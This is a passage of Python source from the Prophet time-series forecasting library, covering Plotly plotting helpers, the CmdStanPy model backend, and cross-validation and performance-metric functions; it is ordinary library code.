({})'.format(dt_names[i])) ax.set_ylabel(metric) return fig def plot_plotly(m, fcst, uncertainty=True, plot_cap=True, trend=False, changepoints=False, changepoints_threshold=0.01, xlabel='ds', ylabel='y', figsize=(900, 600)): """Plot the Prophet forecast with Plotly offline. Plotting in Jupyter Notebook requires initializing plotly.offline.init_notebook_mode(): >>> import plotly.offline as py >>> py.init_notebook_mode() Then the figure can be displayed using plotly.offline.iplot(...): >>> fig = plot_plotly(m, fcst) >>> py.iplot(fig) see https://plot.ly/python/offline/ for details Parameters ---------- m: Prophet model. fcst: pd.DataFrame output of m.predict. uncertainty: Optional boolean to plot uncertainty intervals. plot_cap: Optional boolean indicating if the capacity should be shown in the figure, if available. trend: Optional boolean to plot trend changepoints: Optional boolean to plot changepoints changepoints_threshold: Threshold on trend change magnitude for significance. xlabel: Optional label name on X-axis ylabel: Optional label name on Y-axis Returns ------- A Plotly Figure. """ prediction_color = '#0072B2' error_color = 'rgba(0, 114, 178, 0.2)' # '#0072B2' with 0.2 opacity actual_color = 'black' cap_color = 'black' trend_color = '#B23B00' line_width = 2 marker_size = 4 data = [] # Add actual data.append(go.Scatter( name='Actual', x=m.history['ds'], y=m.history['y'], marker=dict(color=actual_color, size=marker_size), mode='markers' )) # Add lower bound if uncertainty and m.uncertainty_samples: data.append(go.Scatter( x=fcst['ds'], y=fcst['yhat_lower'], mode='lines', line=dict(width=0), hoverinfo='skip' )) # Add prediction data.append(go.Scatter( name='Predicted', x=fcst['ds'], y=fcst['yhat'], mode='lines', line=dict(color=prediction_color, width=line_width), fillcolor=error_color, fill='tonexty' if uncertainty and m.uncertainty_samples else 'none' )) # Add upper bound if uncertainty and m.uncertainty_samples: data.append(go.Scatter( x=fcst['ds'], y=fcst['yhat_upper'], mode='lines', line=dict(width=0), fillcolor=error_color, fill='tonexty', hoverinfo='skip' )) # Add caps if 'cap' in fcst and plot_cap: data.append(go.Scatter( name='Cap', x=fcst['ds'], y=fcst['cap'], mode='lines', line=dict(color=cap_color, dash='dash', width=line_width), )) if m.logistic_floor and 'floor' in fcst and plot_cap: data.append(go.Scatter( name='Floor', x=fcst['ds'], y=fcst['floor'], mode='lines', line=dict(color=cap_color, dash='dash', width=line_width), )) # Add trend if trend: data.append(go.Scatter( name='Trend', x=fcst['ds'], y=fcst['trend'], mode='lines', line=dict(color=trend_color, width=line_width), )) # Add changepoints if changepoints and len(m.changepoints) > 0: signif_changepoints = m.changepoints[ np.abs(np.nanmean(m.params['delta'], axis=0)) >= changepoints_threshold ] data.append(go.Scatter( x=signif_changepoints, y=fcst.loc[fcst['ds'].isin(signif_changepoints), 'trend'], marker=dict(size=50, symbol='line-ns-open', color=trend_color, line=dict(width=line_width)), mode='markers', hoverinfo='skip' )) layout = dict( showlegend=False, width=figsize[0], height=figsize[1], yaxis=dict( title=ylabel ), xaxis=dict( title=xlabel, type='date', rangeselector=dict( buttons=list([ dict(count=7, label='1w', step='day', stepmode='backward'), dict(count=1, label='1m', step='month', stepmode='backward'), dict(count=6, label='6m', step='month', stepmode='backward'), dict(count=1, label='1y', step='year', stepmode='backward'), dict(step='all') ]) ), rangeslider=dict( visible=True ), ), ) fig = go.Figure(data=data, layout=layout) return fig def plot_components_plotly( m, fcst, uncertainty=True, plot_cap=True, figsize=(900, 200)): """Plot the Prophet forecast components using Plotly. See plot_plotly() for Plotly setup instructions Will plot whichever are available of: trend, holidays, weekly seasonality, yearly seasonality, and additive and multiplicative extra regressors. Parameters ---------- m: Prophet model. fcst: pd.DataFrame output of m.predict. uncertainty: Optional boolean to plot uncertainty intervals, which will only be done if m.uncertainty_samples > 0. plot_cap: Optional boolean indicating if the capacity should be shown in the figure, if available. figsize: Set the size for the subplots (in px). Returns ------- A Plotly Figure. """ # Identify components to plot and get their Plotly props components = {} components['trend'] = get_forecast_component_plotly_props( m, fcst, 'trend', uncertainty, plot_cap) if m.train_holiday_names is not None and 'holidays' in fcst: components['holidays'] = get_forecast_component_plotly_props( m, fcst, 'holidays', uncertainty) regressors = {'additive': False, 'multiplicative': False} for name, props in m.extra_regressors.items(): regressors[props['mode']] = True for mode in ['additive', 'multiplicative']: if regressors[mode] and 'extra_regressors_{}'.format(mode) in fcst: components['extra_regressors_{}'.format(mode)] = get_forecast_component_plotly_props( m, fcst, 'extra_regressors_{}'.format(mode)) for seasonality in m.seasonalities: components[seasonality] = get_seasonality_plotly_props(m, seasonality) # Create Plotly subplot figure and add the components to it fig = make_subplots(rows=len(components), cols=1, print_grid=False) fig['layout'].update(go.Layout( showlegend=False, width=figsize[0], height=figsize[1] * len(components) )) for i, name in enumerate(components): if i == 0: xaxis = fig['layout']['xaxis'] yaxis = fig['layout']['yaxis'] else: xaxis = fig['layout']['xaxis{}'.format(i + 1)] yaxis = fig['layout']['yaxis{}'.format(i + 1)] xaxis.update(components[name]['xaxis']) yaxis.update(components[name]['yaxis']) for trace in components[name]['traces']: fig.append_trace(trace, i + 1, 1) return fig def plot_forecast_component_plotly(m, fcst, name, uncertainty=True, plot_cap=False, figsize=(900, 300)): """Plot an particular component of the forecast using Plotly. See plot_plotly() for Plotly setup instructions Parameters ---------- m: Prophet model. fcst: pd.DataFrame output of m.predict. name: Name of the component to plot. uncertainty: Optional boolean to plot uncertainty intervals, which will only be done if m.uncertainty_samples > 0. plot_cap: Optional boolean indicating if the capacity should be shown in the figure, if available. figsize: The plot's size (in px). Returns ------- A Plotly Figure. """ props = get_forecast_component_plotly_props(m, fcst, name, uncertainty, plot_cap) layout = go.Layout( width=figsize[0], height=figsize[1], showlegend=False, xaxis=props['xaxis'], yaxis=props['yaxis'] ) fig = go.Figure(data=props['traces'], layout=layout) return fig def plot_seasonality_plotly(m, name, uncertainty=True, figsize=(900, 300)): """Plot a custom seasonal component using Plotly. See plot_plotly() for Plotly setup instructions Parameters ---------- m: Prophet model. name: Seasonality name, like 'daily', 'weekly'. uncertainty: Optional boolean to plot uncertainty intervals, which will only be done if m.uncertainty_samples > 0. figsize: Set the plot's size (in px). Returns ------- A Plotly Figure. """ props = get_seasonality_plotly_props(m, name, uncertainty) layout = go.Layout( width=figsize[0], height=figsize[1], showlegend=False, xaxis=props['xaxis'], yaxis=props['yaxis'] ) fig = go.Figure(data=props['traces'], layout=layout) return fig def get_forecast_component_plotly_props(m, fcst, name, uncertainty=True, plot_cap=False): """Prepares a dictionary for plotting the selected forecast component with Plotly Parameters ---------- m: Prophet model. fcst: pd.DataFrame output of m.predict. name: Name of the component to plot. uncertainty: Optional boolean to plot uncertainty intervals, which will only be done if m.uncertainty_samples > 0. plot_cap: Optional boolean indicating if the capacity should be shown in the figure, if available. Returns ------- A dictionary with Plotly traces, xaxis and yaxis """ prediction_color = '#0072B2' error_color = 'rgba(0, 114, 178, 0.2)' # '#0072B2' with 0.2 opacity cap_color = 'black' zeroline_color = '#AAA' line_width = 2 range_margin = (fcst['ds'].max() - fcst['ds'].min()) * 0.05 range_x = [fcst['ds'].min() - range_margin, fcst['ds'].max() + range_margin] text = None mode = 'lines' if name == 'holidays': # Combine holidays into one hover text holidays = m.construct_holiday_dataframe(fcst['ds']) holiday_features, _, _ = m.make_holiday_features(fcst['ds'], holidays) holiday_features.columns = holiday_features.columns.str.replace('_delim_', '', regex=False) holiday_features.columns = holiday_features.columns.str.replace('+0', '', regex=False) text = pd.Series(data='', index=holiday_features.index) for holiday_feature, idxs in holiday_features.items(): text[idxs.astype(bool) & (text != '')] += '<br>' # Add newline if additional holiday text[idxs.astype(bool)] += holiday_feature traces = [] traces.append(go.Scatter( name=name, x=fcst['ds'], y=fcst[name], mode=mode, line=go.scatter.Line(color=prediction_color, width=line_width), text=text, )) if uncertainty and m.uncertainty_samples and (fcst[name + '_upper'] != fcst[name + '_lower']).any(): if mode == 'markers': traces[0].update( error_y=dict( type='data', symmetric=False, array=fcst[name + '_upper'], arrayminus=fcst[name + '_lower'], width=0, color=error_color ) ) else: traces.append(go.Scatter( name=name + '_upper', x=fcst['ds'], y=fcst[name + '_upper'], mode=mode, line=go.scatter.Line(width=0, color=error_color) )) traces.append(go.Scatter( name=name + '_lower', x=fcst['ds'], y=fcst[name + '_lower'], mode=mode, line=go.scatter.Line(width=0, color=error_color), fillcolor=error_color, fill='tonexty' )) if 'cap' in fcst and plot_cap: traces.append(go.Scatter( name='Cap', x=fcst['ds'], y=fcst['cap'], mode='lines', line=go.scatter.Line(color=cap_color, dash='dash', width=line_width), )) if m.logistic_floor and 'floor' in fcst and plot_cap: traces.append(go.Scatter( name='Floor', x=fcst['ds'], y=fcst['floor'], mode='lines', line=go.scatter.Line(color=cap_color, dash='dash', width=line_width), )) xaxis = go.layout.XAxis( type='date', range=range_x) yaxis = go.layout.YAxis(rangemode='normal' if name == 'trend' else 'tozero', title=go.layout.yaxis.Title(text=name), zerolinecolor=zeroline_color) if name in m.component_modes['multiplicative']: yaxis.update(tickformat='%', hoverformat='.2%') return {'traces': traces, 'xaxis': xaxis, 'yaxis': yaxis} def get_seasonality_plotly_props(m, name, uncertainty=True): """Prepares a dictionary for plotting the selected seasonality with Plotly Parameters ---------- m: Prophet model. name: Name of the component to plot. uncertainty: Optional boolean to plot uncertainty intervals, which will only be done if m.uncertainty_samples > 0. Returns ------- A dictionary with Plotly traces, xaxis and yaxis """ prediction_color = '#0072B2' error_color = 'rgba(0, 114, 178, 0.2)' # '#0072B2' with 0.2 opacity line_width = 2 zeroline_color = '#AAA' # Compute seasonality from Jan 1 through a single period. start = pd.to_datetime('2017-01-01 0000') period = m.seasonalities[name]['period'] end = start + pd.Timedelta(days=period) if (m.history['ds'].dt.hour == 0).all(): # Day Precision plot_points = np.floor(period).astype(int) elif (m.history['ds'].dt.minute == 0).all(): # Hour Precision plot_points = np.floor(period * 24).astype(int) else: # Minute Precision plot_points = np.floor(period * 24 * 60).astype(int) days = pd.to_datetime(np.linspace(start.value, end.value, plot_points, endpoint=False)) df_y = seasonality_plot_df(m, days) seas = m.predict_seasonal_components(df_y) traces = [] traces.append(go.Scatter( name=name, x=df_y['ds'], y=seas[name], mode='lines', line=go.scatter.Line(color=prediction_color, width=line_width) )) if uncertainty and m.uncertainty_samples and (seas[name + '_upper'] != seas[name + '_lower']).any(): traces.append(go.Scatter( name=name + '_upper', x=df_y['ds'], y=seas[name + '_upper'], mode='lines', line=go.scatter.Line(width=0, color=error_color) )) traces.append(go.Scatter( name=name + '_lower', x=df_y['ds'], y=seas[name + '_lower'], mode='lines', line=go.scatter.Line(width=0, color=error_color), fillcolor=error_color, fill='tonexty' )) # Set tick formats (examples are based on 2017-01-06 21:15) if period <= 2: tickformat = '%H:%M' # "21:15" elif period < 7: tickformat = '%A %H:%M' # "Friday 21:15" elif period < 14: tickformat = '%A' # "Friday" else: tickformat = '%B %e' # "January 6" range_margin = (df_y['ds'].max() - df_y['ds'].min()) * 0.05 xaxis = go.layout.XAxis( tickformat=tickformat, type='date', range=[df_y['ds'].min() - range_margin, df_y['ds'].max() + range_margin] ) yaxis = go.layout.YAxis(title=go.layout.yaxis.Title(text=name), zerolinecolor=zeroline_color) if m.seasonalities[name]['mode'] == 'multiplicative': yaxis.update(tickformat='%', hoverformat='.2%') return {'traces': traces, 'xaxis': xaxis, 'yaxis': yaxis} File: python/prophet/models.py # -*- coding: utf-8 -*- # Copyright (c) Facebook, Inc. and its affiliates. # This source code is licensed under the MIT license found in the # LICENSE file in the root directory of this source tree. from __future__ import absolute_import, division, print_function from abc import abstractmethod, ABC from dataclasses import dataclass from typing import Sequence, Tuple from collections import OrderedDict from enum import Enum import importlib_resources import platform import logging logger = logging.getLogger('prophet.models') PLATFORM = "win" if platform.platform().startswith("Win") else "unix" class TrendIndicator(Enum): LINEAR = 0 LOGISTIC = 1 FLAT = 2 @dataclass class ModelInputData: T: int S: int K: int tau: float trend_indicator: int y: Sequence[float] # length T t: Sequence[float] # length T cap: Sequence[float] # length T t_change: Sequence[float] # length S s_a: Sequence[int] # length K s_m: Sequence[int] # length K X: Sequence[Sequence[float]] # shape (T, K) sigmas: Sequence[float] # length K @dataclass class ModelParams: k: float m: float delta: Sequence[float] # length S beta: Sequence[float] # length K sigma_obs: float class IStanBackend(ABC): def __init__(self): self.model = self.load_model() self.stan_fit = None self.newton_fallback = True def set_options(self, **kwargs): """ Specify model options as kwargs. * newton_fallback [bool]: whether to fallback to Newton if L-BFGS fails """ for k, v in kwargs.items(): if k == 'newton_fallback': self.newton_fallback = v else: raise ValueError(f'Unknown option {k}') @staticmethod @abstractmethod def get_type(): pass @abstractmethod def load_model(self): pass @abstractmethod def fit(self, stan_init, stan_data, **kwargs) -> dict: pass @abstractmethod def sampling(self, stan_init, stan_data, samples, **kwargs) -> dict: pass class CmdStanPyBackend(IStanBackend): CMDSTAN_VERSION = "2.33.1" def __init__(self): import cmdstanpy # this must be set before super.__init__() for load_model to work on Windows local_cmdstan = importlib_resources.files("prophet") / "stan_model" / f"cmdstan-{self.CMDSTAN_VERSION}" if local_cmdstan.exists(): cmdstanpy.set_cmdstan_path(str(local_cmdstan)) super().__init__() @staticmethod def get_type(): return StanBackendEnum.CMDSTANPY.name def load_model(self): import cmdstanpy model_file = importlib_resources.files("prophet") / "stan_model" / "prophet_model.bin" return cmdstanpy.CmdStanModel(exe_file=str(model_file)) def fit(self, stan_init, stan_data, **kwargs): if 'inits' not in kwargs and 'init' in kwargs: stan_init = self.sanitize_custom_inits(stan_init, kwargs['init']) del kwargs['init'] inits_list, data_list = self.prepare_data(stan_init, stan_data) args = dict( data=data_list, inits=inits_list, algorithm='Newton' if data_list['T'] < 100 else 'LBFGS', iter=int(1e4), ) args.update(kwargs) try: self.stan_fit = self.model.optimize(**args) except RuntimeError as e: # Fall back on Newton if not self.newton_fallback or args['algorithm'] == 'Newton': raise e logger.warning('Optimization terminated abnormally. Falling back to Newton.') args['algorithm'] = 'Newton' self.stan_fit = self.model.optimize(**args) params = self.stan_to_dict_numpy( self.stan_fit.column_names, self.stan_fit.optimized_params_np) for par in params: params[par] = params[par].reshape((1, -1)) return params def sampling(self, stan_init, stan_data, samples, **kwargs) -> dict: if 'inits' not in kwargs and 'init' in kwargs: stan_init = self.sanitize_custom_inits(stan_init, kwargs['init']) del kwargs['init'] inits_list, data_list = self.prepare_data(stan_init, stan_data) args = dict( data=data_list, inits=inits_list, ) if 'chains' not in kwargs: kwargs['chains'] = 4 iter_half = samples // 2 kwargs['iter_sampling'] = iter_half if 'iter_warmup' not in kwargs: kwargs['iter_warmup'] = iter_half args.update(kwargs) self.stan_fit = self.model.sample(**args) res = self.stan_fit.draws() (samples, c, columns) = res.shape res = res.reshape((samples * c, columns)) params = self.stan_to_dict_numpy(self.stan_fit.column_names, res) for par in params: s = params[par].shape if s[1] == 1: params[par] = params[par].reshape((s[0],)) if par in ['delta', 'beta'] and len(s) < 2: params[par] = params[par].reshape((-1, 1)) return params @staticmethod def sanitize_custom_inits(default_inits, custom_inits): """Validate that custom inits have the correct type and shape, otherwise use defaults.""" sanitized = {} for param in ['k', 'm', 'sigma_obs']: try: sanitized[param] = float(custom_inits.get(param)) except Exception: sanitized[param] = default_inits[param] for param in ['delta', 'beta']: if default_inits[param].shape == custom_inits[param].shape: sanitized[param] = custom_inits[param] else: sanitized[param] = default_inits[param] return sanitized @staticmethod def prepare_data(init, data) -> Tuple[dict, dict]: """Converts np.ndarrays to lists that can be read by cmdstanpy.""" cmdstanpy_data = { 'T': data['T'], 'S': data['S'], 'K': data['K'], 'tau': data['tau'], 'trend_indicator': data['trend_indicator'], 'y': data['y'].tolist(), 't': data['t'].tolist(), 'cap': data['cap'].tolist(), 't_change': data['t_change'].tolist(), 's_a': data['s_a'].tolist(), 's_m': data['s_m'].tolist(), 'X': data['X'].to_numpy().tolist(), 'sigmas': data['sigmas'] } cmdstanpy_init = { 'k': init['k'], 'm': init['m'], 'delta': init['delta'].tolist(), 'beta': init['beta'].tolist(), 'sigma_obs': init['sigma_obs'] } return (cmdstanpy_init, cmdstanpy_data) @staticmethod def stan_to_dict_numpy(column_names: Tuple[str, ...], data: 'np.array'): import numpy as np output = OrderedDict() prev = None start = 0 end = 0 two_dims = len(data.shape) > 1 for cname in column_names: parsed = cname.split(".") if "." in cname else cname.split("[") curr = parsed[0] if prev is None: prev = curr if curr != prev: if prev in output: raise RuntimeError( "Found repeated column name" ) if two_dims: output[prev] = np.array(data[:, start:end]) else: output[prev] = np.array(data[start:end]) prev = curr start = end end += 1 if prev in output: raise RuntimeError( "Found repeated column name" ) if two_dims: output[prev] = np.array(data[:, start:end]) else: output[prev] = np.array(data[start:end]) return output class StanBackendEnum(Enum): CMDSTANPY = CmdStanPyBackend @staticmethod def get_backend_class(name: str) -> IStanBackend: try: return StanBackendEnum[name].value except KeyError as e: raise ValueError(f"Unknown stan backend: {name}") from e File: python/prophet/diagnostics.py # -*- coding: utf-8 -*- # Copyright (c) Facebook, Inc. and its affiliates. # This source code is licensed under the MIT license found in the # LICENSE file in the root directory of this source tree. from __future__ import absolute_import, division, print_function import logging from tqdm.auto import tqdm from copy import deepcopy import concurrent.futures import numpy as np import pandas as pd logger = logging.getLogger('prophet') def generate_cutoffs(df, horizon, initial, period): """Generate cutoff dates Parameters ---------- df: pd.DataFrame with historical data. horizon: pd.Timedelta forecast horizon. initial: pd.Timedelta window of the initial forecast period. period: pd.Timedelta simulated forecasts are done with this period. Returns ------- list of pd.Timestamp """ # Last cutoff is 'latest date in data - horizon' date cutoff = df['ds'].max() - horizon if cutoff < df['ds'].min(): raise ValueError('Less data than horizon.') result = [cutoff] while result[-1] >= min(df['ds']) + initial: cutoff -= period # If data does not exist in data range (cutoff, cutoff + horizon] if not (((df['ds'] > cutoff) & (df['ds'] <= cutoff + horizon)).any()): # Next cutoff point is 'last date before cutoff in data - horizon' if cutoff > df['ds'].min(): closest_date = df[df['ds'] <= cutoff].max()['ds'] cutoff = closest_date - horizon # else no data left, leave cutoff as is, it will be dropped. result.append(cutoff) result = result[:-1] if len(result) == 0: raise ValueError( 'Less data than horizon after initial window. ' 'Make horizon or initial shorter.' ) logger.info('Making {} forecasts with cutoffs between {} and {}'.format( len(result), result[-1], result[0] )) return list(reversed(result)) def cross_validation(model, horizon, period=None, initial=None, parallel=None, cutoffs=None, disable_tqdm=False, extra_output_columns=None): """Cross-Validation for time series. Computes forecasts from historical cutoff points, which user can input. If not provided, begins from (end - horizon) and works backwards, making cutoffs with a spacing of period until initial is reached. When period is equal to the time interval of the data, this is the technique described in https://robjhyndman.com/hyndsight/tscv/ . Parameters ---------- model: Prophet class object. Fitted Prophet model. horizon: string with pd.Timedelta compatible style, e.g., '5 days', '3 hours', '10 seconds'. period: string with pd.Timedelta compatible style. Simulated forecast will be done at every this period. If not provided, 0.5 * horizon is used. initial: string with pd.Timedelta compatible style. The first training period will include at least this much data. If not provided, 3 * horizon is used. cutoffs: list of pd.Timestamp specifying cutoffs to be used during cross validation. If not provided, they are generated as described above. parallel : {None, 'processes', 'threads', 'dask', object} How to parallelize the forecast computation. By default no parallelism is used. * None : No parallelism. * 'processes' : Parallelize with concurrent.futures.ProcessPoolExectuor. * 'threads' : Parallelize with concurrent.futures.ThreadPoolExecutor. Note that some operations currently hold Python's Global Interpreter Lock, so parallelizing with threads may be slower than training sequentially. * 'dask': Parallelize with Dask. This requires that a dask.distributed Client be created. * object : Any instance with a `.map` method. This method will be called with :func:`single_cutoff_forecast` and a sequence of iterables where each element is the tuple of arguments to pass to :func:`single_cutoff_forecast` .. code-block:: class MyBackend: def map(self, func, *iterables): results = [ func(*args) for args in zip(*iterables) ] return results disable_tqdm: if True it disables the progress bar that would otherwise show up when parallel=None extra_output_columns: A String or List of Strings e.g. 'trend' or ['trend']. Additional columns to 'yhat' and 'ds' to be returned in output. Returns ------- A pd.DataFrame with the forecast, actual value and cutoff. """ if model.history is None: raise Exception('Model has not been fit. Fitting the model provides contextual parameters for cross validation.') df = model.history.copy().reset_index(drop=True) horizon = pd.Timedelta(horizon) predict_columns = ['ds', 'yhat'] if model.uncertainty_samples: predict_columns.extend(['yhat_lower', 'yhat_upper']) if extra_output_columns is not None: if isinstance(extra_output_columns, str): extra_output_columns = [extra_output_columns] predict_columns.extend([c for c in extra_output_columns if c not in predict_columns]) # Identify largest seasonality period period_max = 0. for s in model.seasonalities.values(): period_max = max(period_max, s['period']) seasonality_dt = pd.Timedelta(str(period_max) + ' days') if cutoffs is None: # Set period period = 0.5 * horizon if period is None else pd.Timedelta(period) # Set initial initial = ( max(3 * horizon, seasonality_dt) if initial is None else pd.Timedelta(initial) ) # Compute Cutoffs cutoffs = generate_cutoffs(df, horizon, initial, period) else: # add validation of the cutoff to make sure that the min cutoff is strictly greater than the min date in the history if min(cutoffs) <= df['ds'].min(): raise ValueError("Minimum cutoff value is not strictly greater than min date in history") # max value of cutoffs is <= (end date minus horizon) end_date_minus_horizon = df['ds'].max() - horizon if max(cutoffs) > end_date_minus_horizon: raise ValueError("Maximum cutoff value is greater than end date minus horizon, no value for cross-validation remaining") initial = cutoffs[0] - df['ds'].min() # Check if the initial window # (that is, the amount of time between the start of the history and the first cutoff) # is less than the maximum seasonality period if initial < seasonality_dt: msg = 'Seasonality has period of {} days '.format(period_max) msg += 'which is larger than initial window. ' msg += 'Consider increasing initial.' logger.warning(msg) if parallel: valid = {"threads", "processes", "dask"} if parallel == "threads": pool = concurrent.futures.ThreadPoolExecutor() elif parallel == "processes": pool = concurrent.futures.ProcessPoolExecutor() elif parallel == "dask": try: from dask.distributed import get_client except ImportError as e: raise ImportError("parallel='dask' requires the optional " "dependency dask.") from e pool = get_client() # delay df and model to avoid large objects in task graph. df, model = pool.scatter([df, model]) elif hasattr(parallel, "map"): pool = parallel else: msg = ("'parallel' should be one of {} for an instance with a " "'map' method".format(', '.join(valid))) raise ValueError(msg) iterables = ((df, model, cutoff, horizon, predict_columns) for cutoff in cutoffs) iterables = zip(*iterables) logger.info("Applying in parallel with %s", pool) predicts = pool.map(single_cutoff_forecast, *iterables) if parallel == "dask": # convert Futures to DataFrames predicts = pool.gather(predicts) else: predicts = [ single_cutoff_forecast(df, model, cutoff, horizon, predict_columns) for cutoff in (tqdm(cutoffs) if not disable_tqdm else cutoffs) ] # Combine all predicted pd.DataFrame into one pd.DataFrame return pd.concat(predicts, axis=0).reset_index(drop=True) def single_cutoff_forecast(df, model, cutoff, horizon, predict_columns): """Forecast for single cutoff. Used in cross validation function when evaluating for multiple cutoffs either sequentially or in parallel . Parameters ---------- df: pd.DataFrame. DataFrame with history to be used for single cutoff forecast. model: Prophet model object. cutoff: pd.Timestamp cutoff date. Simulated Forecast will start from this date. horizon: pd.Timedelta forecast horizon. predict_columns: List of strings e.g. ['ds', 'yhat']. Columns with date and forecast to be returned in output. Returns ------- A pd.DataFrame with the forecast, actual value and cutoff. """ # Generate new object with copying fitting options m = prophet_copy(model, cutoff) # Train model history_c = df[df['ds'] <= cutoff] if history_c.shape[0] < 2: raise Exception( 'Less than two datapoints before cutoff. ' 'Increase initial window.' ) m.fit(history_c, **model.fit_kwargs) # Calculate yhat index_predicted = (df['ds'] > cutoff) & (df['ds'] <= cutoff + horizon) # Get the columns for the future dataframe columns = ['ds'] if m.growth == 'logistic': columns.append('cap') if m.logistic_floor: columns.append('floor') columns.extend(m.extra_regressors.keys()) columns.extend([ props['condition_name'] for props in m.seasonalities.values() if props['condition_name'] is not None]) yhat = m.predict(df[index_predicted][columns]) # Merge yhat(predicts), y(df, original data) and cutoff return pd.concat([ yhat[predict_columns], df[index_predicted][['y']].reset_index(drop=True), pd.DataFrame({'cutoff': [cutoff] * len(yhat)}) ], axis=1) def prophet_copy(m, cutoff=None): """Copy Prophet object Parameters ---------- m: Prophet model. cutoff: pd.Timestamp or None, default None. cuttoff Timestamp for changepoints member variable. changepoints are only retained if 'changepoints <= cutoff' Returns ------- Prophet class object with the same parameter with model variable """ if m.history is None: raise Exception('This is for copying a fitted Prophet object.') if m.specified_changepoints: changepoints = m.changepoints if cutoff is not None: # Filter change points '< cutoff' last_history_date = max(m.history['ds'][m.history['ds'] <= cutoff]) changepoints = changepoints[changepoints < last_history_date] else: changepoints = None # Auto seasonalities are set to False because they are already set in # m.seasonalities. m2 = m.__class__( growth=m.growth, n_changepoints=m.n_changepoints, changepoint_range=m.changepoint_range, changepoints=changepoints, yearly_seasonality=False, weekly_seasonality=False, daily_seasonality=False, holidays=m.holidays, holidays_mode=m.holidays_mode, seasonality_mode=m.seasonality_mode, seasonality_prior_scale=m.seasonality_prior_scale, changepoint_prior_scale=m.changepoint_prior_scale, holidays_prior_scale=m.holidays_prior_scale, mcmc_samples=m.mcmc_samples, interval_width=m.interval_width, uncertainty_samples=m.uncertainty_samples, stan_backend=( m.stan_backend.get_type() if m.stan_backend is not None else None ), ) m2.extra_regressors = deepcopy(m.extra_regressors) m2.seasonalities = deepcopy(m.seasonalities) m2.country_holidays = deepcopy(m.country_holidays) return m2 def performance_metrics(df, metrics=None, rolling_window=0.1, monthly=False): """Compute performance metrics from cross-validation results. Computes a suite of performance metrics on the output of cross-validation. By default the following metrics are included: 'mse': mean squared error 'rmse': root mean squared error 'mae': mean absolute error 'mape': mean absolute percent error 'mdape': median absolute percent error 'smape': symmetric mean absolute percentage error 'coverage': coverage of the upper and lower intervals A subset of these can be specified by passing a list of names as the `metrics` argument. Metrics are calculated over a rolling window of cross validation predictions, after sorting by horizon. Averaging is first done within each value of horizon, and then across horizons as needed to reach the window size. The size of that window (number of simulated forecast points) is determined by the rolling_window argument, which specifies a proportion of simulated forecast points to include in each window. rolling_window=0 will compute it separately for each horizon. The default of rolling_window=0.1 will use 10% of the rows in df in each window. rolling_window=1 will compute the metric across all simulated forecast points. The results are set to the right edge of the window. If rolling_window < 0, then metrics are computed at each datapoint with no averaging (i.e., 'mse' will actually be squared error with no mean). The output is a dataframe containing column 'horizon' along with columns for each of the metrics computed. Parameters ---------- df: The dataframe returned by cross_validation. metrics: A list of performance metrics to compute. If not provided, will use ['mse', 'rmse', 'mae', 'mape', 'mdape', 'smape', 'coverage']. rolling_window: Proportion of data to use in each rolling window for computing the metrics. Should be in [0, 1] to average. monthly: monthly=True will compute horizons as numbers of calendar months from the cutoff date, starting from 0 for the cutoff month. Returns ------- Dataframe with a column for each metric, and column 'horizon' """ valid_metrics = ['mse', 'rmse', 'mae', 'mape', 'mdape', 'smape', 'coverage'] if metrics is None: metrics = valid_metrics if ('yhat_lower' not in df or 'yhat_upper' not in df) and ('coverage' in metrics): metrics.remove('coverage') if len(set(metrics)) != len(metrics): raise ValueError('Input metrics must be a list of unique values') if not set(metrics).issubset(set(valid_metrics)): raise ValueError( 'Valid values for metrics are: {}'.format(valid_metrics) ) df_m = df.copy() if monthly: df_m['horizon'] = df_m['ds'].dt.to_period('M').astype(int) - df_m['cutoff'].dt.to_period('M').astype(int) else: df_m['horizon'] = df_m['ds'] - df_m['cutoff'] df_m.sort_values('horizon', inplace=True) if 'mape' in metrics and df_m['y'].abs().min() < 1e-8: logger.info('Skipping MAPE because y close to 0') metrics.remove('mape') if len(metrics) == 0: return None w = int(rolling_window * df_m.shape[0]) if w >= 0: w = max(w, 1) w = min(w, df_m.shape[0]) # Compute all metrics dfs = {} for metric in metrics: dfs[metric] = eval(metric)(df_m, w) res = dfs[metrics[0]] for i in range(1, len(metrics)): res_m = dfs[metrics[i]] assert np.array_equal(res['horizon'].values, res_m['horizon'].values) res[metrics[i]] = res_m[metrics[i]] return res def rolling_mean_by_h(x, h, w, name): """Compute a rolling mean of x, after first aggregating by h. Right-aligned. Computes a single mean for each unique value of h. Each mean is over at least w samples. Parameters ---------- x: Array. h: Array of horizon for each value in x. w: Integer window size (number of elements). name: Name for metric in result dataframe Returns ------- Dataframe with columns horizon and name, the rolling mean of x. """ # Aggregate over h df = pd.DataFrame({'x': x, 'h': h}) df2 = ( df.groupby('h').agg(['sum', 'count']).reset_index().sort_values('h') ) xs = df2['x']['sum'].values ns = df2['x']['count'].values hs = df2.h.values trailing_i = len(df2) - 1 x_sum = 0 n_sum = 0 # We don't know output size but it is bounded by len(df2) res_x = np.empty(len(df2)) # Start from the right and work backwards for i in range(len(df2) - 1, -1, -1): x_sum += xs[i] n_sum += ns[i] while n_sum >= w: # Include points from the previous horizon. All of them if still # less than w, otherwise weight the mean by the difference excess_n = n_sum - w excess_x = excess_n * xs[i] / ns[i] res_x[trailing_i] = (x_sum - excess_x)/ w x_sum -= xs[trailing_i] n_sum -= ns[trailing_i] trailing_i -= 1 res_h = hs[(trailing_i + 1):] res_x = res_x[(trailing_i + 1):] return pd.DataFrame({'horizon': res_h, name: res_x}) def rolling_median_by_h(x, h, w, name): """Compute a rolling median of x, after first aggregating by h. Right-aligned. Computes a single median for each unique value of h. Each median is over at least w samples. For each h where there are fewer than w samples, we take samples from the previous h, moving backwards. (In other words, we ~ assume that the x's are shuffled within each h.) Parameters ---------- x: Array. h: Array of horizon for each value in x. w: Integer window size (number of elements). name: Name for metric in result dataframe Returns ------- Dataframe with columns horizon and name, the rolling median of x. """ # Aggregate over h df = pd.DataFrame({'x': x, 'h': h}) grouped = df.groupby('h') df2 = grouped.size().reset_index().sort_values('h') hs = df2['h'] res_h = [] res_x = [] # Start from the right and work backwards i = len(hs) - 1 while i >= 0: h_i = hs[i] xs = grouped.get_group(h_i).x.tolist() # wrap in array so this works if h is pandas Series with custom index or numpy array next_idx_to_add = np.array(h == h_i).argmax() - 1 while (len(xs) < w) and (next_idx_to_add >= 0): # Include points from the previous horizon. All of them if still # less than w, otherwise just enough to get to w. xs.append(x[next_idx_to_add]) next_idx_to_add -= 1 if len(xs) < w: # Ran out of points before getting enough. break res_h.append(hs[i]) res_x.append(np.median(xs)) i -= 1 res_h.reverse() res_x.reverse() return pd.DataFrame({'horizon': res_h, name: 